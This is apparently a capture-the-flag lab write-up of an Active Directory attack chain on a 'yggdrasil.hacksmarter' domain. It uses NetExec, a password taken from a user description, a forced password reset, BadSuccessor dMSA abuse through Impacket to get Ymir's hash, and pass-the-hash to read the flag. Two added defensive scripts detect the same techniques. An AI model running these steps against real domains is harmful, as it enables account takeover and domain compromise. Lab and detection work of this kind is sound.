MidGarden2
Objective/Scope
As a member of the Hack Smarter Red Team, you have been assigned to this engagement to conduct a comprehensive penetration test of the client's internal environment.
The client has a mature security posture and has previously undergone multiple internal penetration testing engagements. Given our team's advanced expertise in ethical hacking, the primary objective of this assessment is to identify attack vectors that may have been overlooked in prior engagements.
Starting Creds
freyja : Fr3yja!Dr@g0n^12
Enum Shares
❯ nxc smb midgarddc -u freyja -p 'Fr3yja!Dr@g0n^12' --shares
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\freyja:Fr3yja!Dr@g0n^12
SMB 10.1.42.97 445 MIDGARDDC [*] Enumerated shares
SMB 10.1.42.97 445 MIDGARDDC Share Permissions Remark
SMB 10.1.42.97 445 MIDGARDDC ----- ----------- ------
SMB 10.1.42.97 445 MIDGARDDC ADMIN$ Remote Admin
SMB 10.1.42.97 445 MIDGARDDC C$ Default share
SMB 10.1.42.97 445 MIDGARDDC IPC$ READ Remote IPC
SMB 10.1.42.97 445 MIDGARDDC NETLOGON READ Logon server share
SMB 10.1.42.97 445 MIDGARDDC scripts
SMB 10.1.42.97 445 MIDGARDDC SYSVOL READ Logon server share
Enum Users
❯ nxc smb midgarddc -u freyja -p 'Fr3yja!Dr@g0n^12' --users
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\freyja:Fr3yja!Dr@g0n^12
SMB 10.1.42.97 445 MIDGARDDC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.1.42.97 445 MIDGARDDC Administrator 2025-09-06 13:40:14 0 Built-in account for administering the computer/domain
SMB 10.1.42.97 445 MIDGARDDC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.1.42.97 445 MIDGARDDC krbtgt 2025-09-06 13:48:07 0 Key Distribution Center Service Account
SMB 10.1.42.97 445 MIDGARDDC Odin 2025-11-07 04:17:55 0 DA
SMB 10.1.42.97 445 MIDGARDDC Ymir 2025-09-06 14:28:27 0 EA
SMB 10.1.42.97 445 MIDGARDDC Thor 2025-09-06 14:27:54 0 Temp:Th0r!W!nt3rFang
SMB 10.1.42.97 445 MIDGARDDC Loki 2025-09-06 14:19:50 0
SMB 10.1.42.97 445 MIDGARDDC Frigg 2025-09-06 14:28:39 0
SMB 10.1.42.97 445 MIDGARDDC Baldr 2025-09-06 14:28:54 0
SMB 10.1.42.97 445 MIDGARDDC Hel 2025-09-06 14:29:05 0
SMB 10.1.42.97 445 MIDGARDDC Freyja 2025-09-06 14:29:16 0
SMB 10.1.42.97 445 MIDGARDDC Sif 2025-09-06 14:30:40 0 PC Specialist 2
SMB 10.1.42.97 445 MIDGARDDC Njord 2025-09-06 14:30:49 0
SMB 10.1.42.97 445 MIDGARDDC Skadi 2025-09-06 14:30:58 0 PC Specialist 2
SMB 10.1.42.97 445 MIDGARDDC Heimdall 2025-09-15 02:21:08 0 Seriously Secure service account for Yggdrasil services
SMB 10.1.42.97 445 MIDGARDDC Bragi 2025-09-06 14:31:19 0
SMB 10.1.42.97 445 MIDGARDDC Idunn 2025-09-06 14:31:34 0
SMB 10.1.42.97 445 MIDGARDDC Hodr 2025-09-15 02:21:08 0 Web Server Administrator
SMB 10.1.42.97 445 MIDGARDDC Forseti 2025-09-06 14:32:02 0
SMB 10.1.42.97 445 MIDGARDDC Ullr 2025-09-06 14:32:46 0 PC Specialist 1
SMB 10.1.42.97 445 MIDGARDDC Tyr 2025-09-06 14:40:00 0 PC Specialist 1
Possible temporary credentials for Thor, leaked in the account description:
SMB 10.1.42.97 445 MIDGARDDC Thor 2025-09-06 14:27:54 0 Temp:Th0r!W!nt3rFang
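The defender-side check for this finding is a periodic audit of user descriptions for anything that looks like a credential. The script below is an added example, not part of the original writeup and not a NetExec feature: it parses a user listing in the `nxc smb --users` layout shown above (the sample input is constructed from those rows) and flags descriptions that carry a credential keyword followed by a value, or a password-shaped token (mixed case, digits and symbols). The heuristics are this example's own.

```python
import re

# Constructed sample shaped like the `nxc smb --users` output above; the
# account names and descriptions are those the page shows (no new data).
SAMPLE_NXC_USERS = """\
SMB 10.1.42.97 445 MIDGARDDC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.1.42.97 445 MIDGARDDC Administrator 2025-09-06 13:40:14 0 Built-in account for administering the computer/domain
SMB 10.1.42.97 445 MIDGARDDC Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.1.42.97 445 MIDGARDDC Odin 2025-11-07 04:17:55 0 DA
SMB 10.1.42.97 445 MIDGARDDC Thor 2025-09-06 14:27:54 0 Temp:Th0r!W!nt3rFang
SMB 10.1.42.97 445 MIDGARDDC Loki 2025-09-06 14:19:50 0
SMB 10.1.42.97 445 MIDGARDDC Sif 2025-09-06 14:30:40 0 PC Specialist 2
SMB 10.1.42.97 445 MIDGARDDC Heimdall 2025-09-15 02:21:08 0 Seriously Secure service account for Yggdrasil services
"""

# One nxc user row: proto/ip/port/host prefix, username, last-pw-set timestamp
# or <never>, bad-password count, then an optional free-text description.
ROW_RE = re.compile(
    r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<user>\S+)\s+"
    r"(?P<pwset>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}|<never>)\s+"
    r"(?P<badpw>\d+)(?:\s+(?P<desc>.*))?$"
)

# A credential keyword immediately followed by ':' or '=' (e.g. "Temp:...").
KEYWORD_RE = re.compile(
    r"\b(temp|pass(?:word|wd)?|pwd|cred(?:ential)?s?|pw|secret)\b\s*[:=]", re.I
)


def looks_like_password(token):
    """Password-shaped: >= 8 chars, contains a digit, and at least three of
    lower/upper/digit/symbol. The digit requirement keeps words such as
    'Built-in' from being flagged."""
    if len(token) < 8 or " " in token or not any(c.isdigit() for c in token):
        return False
    classes = (
        any(c.islower() for c in token),
        any(c.isupper() for c in token),
        any(c.isdigit() for c in token),
        any(not c.isalnum() for c in token),
    )
    return sum(classes) >= 3


def parse_users(text):
    """Return one dict per parsed user row; header and noise lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            rows.append({"user": m["user"], "pwset": m["pwset"],
                         "badpw": int(m["badpw"]), "desc": (m["desc"] or "").strip()})
    return rows


def flag_descriptions(text):
    """Return (user, reason, description) for every suspicious description."""
    findings = []
    for row in parse_users(text):
        desc = row["desc"]
        if not desc:
            continue
        reason = None
        if KEYWORD_RE.search(desc):
            reason = "credential keyword"
        else:
            # Split on whitespace and the usual key/value separators so that
            # "Temp:Th0r..." yields the value as its own token.
            for tok in re.split(r"[\s:=]+", desc):
                if looks_like_password(tok):
                    reason = "password-like token"
                    break
        if reason:
            findings.append((row["user"], reason, desc))
    return findings


if __name__ == "__main__":
    # Report the account and the reason only; the value itself stays out of
    # the console so the audit log does not become a second leak.
    for user, reason, _desc in flag_descriptions(SAMPLE_NXC_USERS):
        print(f"{user}: description flagged ({reason})")
```

Running it on the sample reports only Thor. On a real directory, pulling the `description` attribute via LDAP and feeding the rows through `flag_descriptions` gives the same check without the SMB listing.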
Valid Creds for THOR
❯ nxc ldap midgarddc -u Thor -p 'Th0r!W!nt3rFang'
LDAP 10.1.42.97 389 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:None) (channel binding:No TLS cert)
LDAP 10.1.42.97 389 MIDGARDDC [+] yggdrasil.hacksmarter\Thor:Th0r!W!nt3rFang
Gather Bloodhound Data
❯ nxc ldap midgarddc.yggdrasil.hacksmarter -u thor -p 'Th0r!W!nt3rFang' --bloodhound -c all --dns-server 10.1.42.97
❯ rusthound-ce --domain yggdrasil.hacksmarter -u thor -p Th0r!W!nt3rFang

Change Password for HODR
❯ nxc smb midgarddc.yggdrasil.hacksmarter -u thor -p 'Th0r!W!nt3rFang' -M change-password -o USER=hodr NEWPASS=tommy123
SMB 10.1.42.97 445 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 x64 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.1.42.97 445 MIDGARDDC [+] yggdrasil.hacksmarter\thor:Th0r!W!nt3rFang
CHANGE-P... 10.1.42.97 445 MIDGARDDC [+] Successfully changed password for hodr
Evil-WinRM Access as HODR
❯ ewp -i 10.1.42.97 -u hodr -p tommy123
[evil-winrm-py banner] v1.5.0
[*] Connecting to '10.1.42.97:5985' as 'hodr'
evil-winrm-py PS C:\Users\Hodr.YGGDRASIL\Documents>
user.txt
evil-winrm-py PS C:\Users\Hodr.YGGDRASIL\Desktop> cat user.txt
Find C:\scripts
evil-winrm-py PS C:\> ls
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/1/2024 12:02 AM PerfLogs
d-r--- 11/6/2025 11:29 AM Program Files
d-r--- 4/1/2024 1:16 AM Program Files (x86)
d----- 9/14/2025 7:40 PM scripts
d-r--- 11/6/2025 8:13 PM Users
d----- 11/6/2025 8:33 PM Windows
evil-winrm-py PS C:\scripts> dir
Directory: C:\scripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/14/2025 7:40 PM 2134 create-dMSA.ps1
-a---- 9/14/2025 7:39 PM 1402 dmsa_find.ps1
-a---- 9/14/2025 7:39 PM 35 replicate-DCs.ps1
Makes me think of BadSuccessor, given the dMSA names in the scripts.
Check for Badsuccessor with Netexec
❯ nxc ldap midgarddc -u hodr -p 'tommy123' -M badsuccessor
LDAP 10.1.128.204 389 MIDGARDDC [*] Windows 11 / Server 2025 Build 26100 (name:MIDGARDDC) (domain:yggdrasil.hacksmarter) (signing:None) (channel binding:No TLS cert)
LDAP 10.1.128.204 389 MIDGARDDC [+] yggdrasil.hacksmarter\hodr:tommy123
BADSUCCE... 10.1.128.204 389 MIDGARDDC [+] Found domain controller with operating system Windows Server 2025: 10.1.128.204 (MidgardDC.yggdrasil.hacksmarter)
BADSUCCE... 10.1.128.204 389 MIDGARDDC [+] Found 1 results
BADSUCCE... 10.1.128.204 389 MIDGARDDC webServerAdmins (S-1-5-21-4282326175-1721253212-1354516517-1601), OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
webServerAdmins (S-1-5-21-4282326175-1721253212-1354516517-1601), OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
This is perfect. The user hodr is in the webServerAdmins group and can create objects in the OU OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter.
Verify Permissions for HODR
❯ bloodyad --host MIDGARDDC.yggdrasil.hacksmarter --user hodr --password tommy123 get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=yggdrasil,DC=hacksmarter
permission: WRITE
distinguishedName: CN=Hodr,OU=Web Admins,OU=Yggdrasil Users,DC=yggdrasil,DC=hacksmarter
permission: WRITE
distinguishedName: CN=VanaheimWeb1,OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
distinguishedName: CN=VanaheimWeb2,OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
distinguishedName: OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter
permission: CREATE_CHILD
Use Impacket for the rest.
Badsuccessor.py
❯ badsuccessor.py -dmsa-name new_DMSA -target-ou 'OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter' -action add 'yggdrasil.hacksmarter/hodr' -k -no-pass -dc-ip 10.1.212.77 -dc-host midgarddc.YGGDRASIL.HACKSMARTER -method LDAP -target-account ymir
Impacket v0.14.0.dev0+20251114.155318.8925c2ce - Copyright Fortra, LLC and its affiliated companies
[*] Connected to 10.1.212.77 as yggdrasil.hacksmarter\hodr
[*]
[*] ------------------------------ ------------------------------
[*] dMSA Name: new_DMSA$
[*] DNS Hostname: new_dmsa.yggdrasil.hacksmarter
[*] Migration status: 2
[*] Principals Allowed: hodr
[*] Target Account: ymir
Request a service ticket to impersonate the new dMSA account (this also returns the "previous" user's hash/keys):
❯ getST.py 'yggdrasil.hacksmarter/hodr' -dc-ip 10.1.212.77 -impersonate 'new_DMSA$' -k -no-pass -dmsa -self
Impacket v0.14.0.dev0+20251114.155318.8925c2ce - Copyright Fortra, LLC and its affiliated companies
[*] Impersonating new_DMSA$
[*] Requesting S4U2self
[*] Current keys:
[*] EncryptionTypes.aes256_cts_hmac_sha1_96:951e48097bfc1189da830c26faba900f256197e1accba076b8327755ec825a01
[*] EncryptionTypes.aes128_cts_hmac_sha1_96:a20c635617d998d26fb99fb5e4d472b9
[*] EncryptionTypes.rc4_hmac:21316a87e36cfa4b1abef45013f4662f
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:8dd4cfe0f89272424e50f5089b8696ec
[*] Saving ticket in new_DMSA$@krbtgt_YGGDRASIL.HACKSMARTER@YGGDRASIL.HACKSMARTER.ccache
### Hash of the previous user, i.e. ymir ###
[*] Previous keys:
[*] EncryptionTypes.rc4_hmac:8dd4cfe0f89272424e50f5089b8696ec
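Detection side of the chain above, as an added example that is not from the writeup, Impacket or NetExec. With Directory Service Changes auditing enabled on the OU, the two LDAP writes behind the `badsuccessor.py -action add` step show up as Security event 5137 (a new object of class msDS-DelegatedManagedServiceAccount) and event 5136 (the msDS-ManagedAccountPrecededByLink attribute set to the account to be inherited, which is what the tool reports as "Target Account: ymir"). The function below correlates the two per object DN. Field names follow the 5136/5137 event schema; the events themselves are constructed, and the two attribute/class names do not appear on the page.

```python
import json

DMSA_CLASS = "msDS-DelegatedManagedServiceAccount"
PRECEDED_BY = "msDS-ManagedAccountPrecededByLink"
VALUE_ADDED = "%%14674"  # 5136 OperationType code for "Value Added"

OU = "OU=Web Servers,OU=Yggdrasil Servers,DC=yggdrasil,DC=hacksmarter"

# Constructed sample events (not real logs from the engagement), shaped after
# the fields of Security events 5137 (object created) and 5136 (object
# modified). The dMSA name and OU are the ones the writeup used.
SAMPLE_EVENTS = [
    {"EventID": 5137, "SubjectUserName": "hodr",
     "ObjectDN": f"CN=new_DMSA,{OU}", "ObjectClass": DMSA_CLASS},
    {"EventID": 5136, "SubjectUserName": "hodr",
     "ObjectDN": f"CN=new_DMSA,{OU}", "ObjectClass": DMSA_CLASS,
     "AttributeLDAPDisplayName": PRECEDED_BY,
     "AttributeValue": "CN=Ymir,OU=Yggdrasil Users,DC=yggdrasil,DC=hacksmarter",
     "OperationType": VALUE_ADDED},
    # Benign noise: a computer account created and described by an admin.
    {"EventID": 5137, "SubjectUserName": "Odin",
     "ObjectDN": f"CN=VanaheimWeb3,{OU}", "ObjectClass": "computer"},
    {"EventID": 5136, "SubjectUserName": "Odin",
     "ObjectDN": f"CN=VanaheimWeb3,{OU}", "ObjectClass": "computer",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "web node 3",
     "OperationType": VALUE_ADDED},
]


def detect_dmsa_abuse(events, trusted_creators=frozenset()):
    """Correlate dMSA creation (5137) with a predecessor link (5136 on
    msDS-ManagedAccountPrecededByLink) for each object DN.

    trusted_creators: lower-cased account names expected to create dMSAs
    (migration or admin accounts). A dMSA created by anyone else is medium;
    a predecessor link written on any dMSA is the BadSuccessor signature
    and is rated high regardless of who wrote it.
    """
    created = {}  # dn -> creator
    linked = {}   # dn -> (actor, predecessor dn)
    for ev in events:
        if ev.get("ObjectClass") != DMSA_CLASS:
            continue
        dn = ev["ObjectDN"]
        if ev["EventID"] == 5137:
            created[dn] = ev["SubjectUserName"]
        elif (ev["EventID"] == 5136
              and ev.get("AttributeLDAPDisplayName") == PRECEDED_BY
              and ev.get("OperationType") == VALUE_ADDED):
            linked[dn] = (ev["SubjectUserName"], ev["AttributeValue"])

    findings = []
    for dn in sorted(set(created) | set(linked)):
        creator = created.get(dn)
        link = linked.get(dn)
        if link:
            severity = "high"
        elif creator and creator.lower() in trusted_creators:
            severity = "info"
        else:
            severity = "medium"
        findings.append({
            "dmsa": dn,
            "creator": creator,
            "linked_by": link[0] if link else None,
            "predecessor": link[1] if link else None,
            "severity": severity,
        })
    return findings


if __name__ == "__main__":
    for finding in detect_dmsa_abuse(SAMPLE_EVENTS, trusted_creators={"odin"}):
        print(json.dumps(finding))
```

The events only exist if the "Audit Directory Service Changes" subcategory is on and the OU carries a SACL for object creation and attribute writes; without that, the CREATE_CHILD right shown in the bloodyAD output is invisible when it is used, so reviewing who holds CREATE_CHILD on OUs in a Server 2025 domain is the preventive counterpart to this detection.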
root.txt
❯ ewp -i midgarddc -u ymir -H 8dd4cfe0f89272424e50f5089b8696ec
evil-winrm-py PS C:\Users\Administrator\Desktop> cat root.txt
AEA41460BEE0E3291F7C4D7E4F356EE0